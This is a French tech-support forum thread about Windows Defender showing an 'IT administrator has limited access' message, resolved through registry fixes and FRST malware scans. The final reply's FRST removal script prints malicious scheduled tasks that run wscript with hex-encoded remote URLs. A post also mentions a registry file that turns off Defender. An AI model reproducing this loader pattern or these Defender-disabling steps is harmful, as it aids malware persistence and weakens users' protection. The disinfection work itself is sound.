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"Votre administrateur IT a limité l'accès (...)" [Résolu/Fermé]

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- - Dernière réponse : Malekal_morte-
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16 janvier 2019
- 25 nov. 2018 à 13:04
Boujour,

Je suis sous Windows 10. Lorsque je me rends dans le menu suivant :

- Paramètres
- Sécurité de Windows
- Protection contre les virus et menaces

Le message ci-dessous apparaît :



Il s’agit bien de mon ordinateur personnel, je ne comprends pas cette limitation. J'aimerai pouvoir y accéder. Merci à ceux qui tenteront de m'éclairer sur ce sujet !

Bonne soirée
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3 réponses

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16 janvier 2019
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Merci
Salut,

C'est galère ces trucs.
Tente le fichier reg de cette page : https://www.malekal.com/windows-defender-geree-organisation/

Si pas mieux :

Pour vérifier l'ordinateur, je t'invite à faire cette analyse FRST et donner les rapports en retour :

Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST,
Attendre la fin du scan, un message indique que l'analyse est terminée.

Trois rapports FRST seront générés :
  • FRST.txt
  • Shortcut.txt
  • Additionnal.txt


Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ afin de les partager.
En retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.



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hardskiper
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12 septembre 2018
1 -
Merci @Malekal_morte-

Problème résolu grâce à ton premier lien, super !
Malekal_morte-
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16 janvier 2019
20757 > hardskiper
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12 septembre 2018
-
ben de rien :)
La mise à jour du registre a réglé le problème. Merci.
A très bien bien marché pour moi, merci !
Malekal_morte-
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16 janvier 2019
20757 -
Ce sujet a été fermé suite à un trop grand nombres de demandes de désinfection.

Si vous avez besoin d'aide, veuillez créer votre propre sujet en allant dans la partie Virus du forum et en cliquant sur le bouton Poser une question.
Remplissez les champs et envoyer votre demande.



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18 septembre 2018
Malekal_morte-
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16 janvier 2019
20757 -
Salut,

Il y a bien une restriction sur Windows Defender mais Kaspersky Security Cloud est installé.
S'il fait office d'antivirus, c'est normal que Windows Defender soit désactivé.
Modernfred
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18 septembre 2018
-
Bonjour et merci pour votre retour rapide,

Entièrement d'accord concernant Kaspersky qui fait office de protection mais il me semble quand même curieux que cette fenêtre s'affiche à chaque fois, ce n'était pas le cas lorsque j'utilisais Avira !?




Pour information, et malheureusement avant que je ne tombe sur ce forum, j'ai d'abord suivi les instructions Malekal suivantes : https://www.malekal.com/windows-defender-geree-organisation/
Et puis j'ai téléchargé et installé le fichier .reg ,
Après cela, je ne pouvais plus désactiver l'analyse périodique de Defender et j'avais toujours cette fameuse fenêtre,
J'ai donc trouvé un autre fichier Turn_Off_Windows_Defender_Antivirus.reg sur le site https://www.tenforums.com/tutorials/5918-turn-off-windows-defender-windows-10-a.html me permettant de désactiver Defender,
La désactivation de l'analyse périodique a fonctionné mais j'ai toujours cette fenêtre intempestive qui s'affiche encore,
A tout hasard, voici les valeurs du registre de Defender :



En parcourant Internet, j'ai aussi vu que Microsoft indiquait qu'une mise à jour avait réglé ce problème !!?

Désolé d'insister mais je ne comprends pas la raison pour laquelle cette fenêtre s'affiche.

Amicalement
Malekal_morte-
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20757 > Modernfred
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18 septembre 2018
-
Normalement, Widnows Defender est censé annoncer que Kaspersky est ton antivirus.
Sinon tu laisses comme cela, et si un jour tu veux quitter Kaspersky, tu fais ce qu'il faut ici ?

Il faudrait pas que Windows Defender se réactive et que tu aies deux antivirus.
Modernfred
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18 septembre 2018
-
Bonjour Malekal_morte,

D'abord et avant tout, un grand merci pour tes réponses.

Pour information, après avoir désinstaller Kaspersky Security Cloud Free, Windows Defender s'est bien réactivé de lui-même sans la fenêtre "Page non disponible",
Avant de ré-sinstaller Kaspersky, j'ai supprimé les 04 valeurs DWORD du registre en comprenant que par défaut, il n'y a pas d'intérêt à les conserver (sauf exception), et qu'il était donc préférable de laisser Windows gérer Defender à sa façon,
Après la ré-installation de Kaspersky, j'obtiens toujours la fenêtre "Page non disponible" :



Et ensuite après avoir fermé cette fenêtre, voici à quoi cela ressemble :



Defender a bien pris en compte l'antivirus Kaspersky :



En revanche en ce qui concerne le pare feu et la protection réseau, voici ce que l'on obtient :



Mais pas de souci car et Kaspersky et le parefeu Defender sont bien actifs :





En conclusion, je pense que le problème tient au fait que Kaspersky Security Cloud Free étant une suite très récente, un certain nombre de bugs sont à corriger de leur part. Je vais les informer et si j'obtiens une réponse de Kaspersky, je ne maquerai pas de compléter ce sujet.

Encore merci et à très bientôt sur nos lignes!
Malekal_morte-
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16 janvier 2019
20757 -
Possible, c'est difficile d'être sûr.
Il me semble que dans les précédents sujet, c'était avec Avira.
0
Merci
Bonjour,

j'ai le même problème et toute mes tentatives pour le résoudre n'ont pas fonctionné pour l'instant. Voici les 3 liens FRST:

https://pjjoint.malekal.com/files.php?id=FRST_20181121_z8y7v7v14b9
https://pjjoint.malekal.com/files.php?id=20181121_e8y15u10d14p12
https://pjjoint.malekal.com/files.php?id=20181121_c11o13l12o7f8

Merci d'avance à ceux qui m'aideront!
Malekal_morte-
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16 janvier 2019
20757 -
Salut,

Tu t'es fait avoir par un installer InstallCore, une plateforme de PUP (programmes potentiellement indésirables) qui est proposé sur des sites de téléchargement ou à travers de fausses mises à jour Java, Flash.
Cela propose d'installer Chromium pour forcer Yahoo!, ByteFence, Avast!, McAfee Security Advisor ou McAfee LiveSafe.
Pour ne plus te faire avoir à lire : PUPs InstallCore


A désinstaller :
Akamai NetSession Interface
CCleaner
Chromium
QuickTime



PS : CCleaner n'est pas vraiment utile, même si on le recommande de partout.
Si tu veux le garder, désactive la surveillance de CCleaner, inutile, ça se met au démarrage de Windows et le ralentit avec ces nettoyages incessants, voir : https://www.malekal.com/supprimer-ccleaner-demarrage-windows/

~~

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

CreateRestorePoint:
CloseProcesses:
Task: {459F42B6-5689-4C6A-BCA2-833A6D2DF9B3} - System32\Tasks\Yahoo! Powered mamil => C:\windows\system32\wscript.exe "C:\ProgramData\{A9F96C9A-23BB-E65C-A57D-781E3F3FF3D0}\cara.txt" "687474703a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b41394639364339412d323342422d453635432d413537442d3738314533463346463344307d5c6c656c69666f" "433a5c50726f6772616d446174615c7b41394639364339412d323342422d453635432d413537 (l'élément de données a 78 caractères en plus). <==== ATTENTION
Task: {A8081013-1950-4616-A2EB-84208A41F8BB} - System32\Tasks\Secured Yahoo Powered mamil => C:\windows\system32\wscript.exe "C:\ProgramData\{AA166F75-2054-E5B3-A692-7BF13CD0F03F}\cara.txt" "68747470733a2f2f6464756b6d716c2e636f6d" "433a5c50726f6772616d446174615c7b41413136364637352d323035342d453542332d413639322d3742463133434430463033467d5c6c656c69666f" "433a5c50726f6772616d446174615c7b41413136364637352d323035342d453542332d (l'élément de données a 84 caractères en plus). <==== ATTENTION
Task: {AA57AE34-96C5-4D19-8D43-C63797245672} - System32\Tasks\{2FB487FC-5111-4506-8573-0927D3C2D216} => C:\Users\Nathan Epagneul\AppData\Roaming\2FB487FC-5111-4506-8573-0927D3C2D216\sync.exe [2017-08-22] () <==== ATTENTION
C:\Users\Nathan Epagneul\AppData\Roaming\2FB487FC-5111-4506-8573-0927D3C2D216
GroupPolicy: Restriction ? <==== ATTENTION
HKU\S-1-5-21-1659958284-1176691849-2672429332-1002\...\Run: [Chromium] => c:\users\nathan epagneul\appdata\local\chromium\application\chrome.exe [1034752 2016-03-16] (The Chromium Authors)
c:\users\nathan epagneul\appdata\local\chromium
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
EmptyTemp:
RemoveProxy:
Reboot:


Enregistre le contenu par le menu fichier puis enregistrer.

Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

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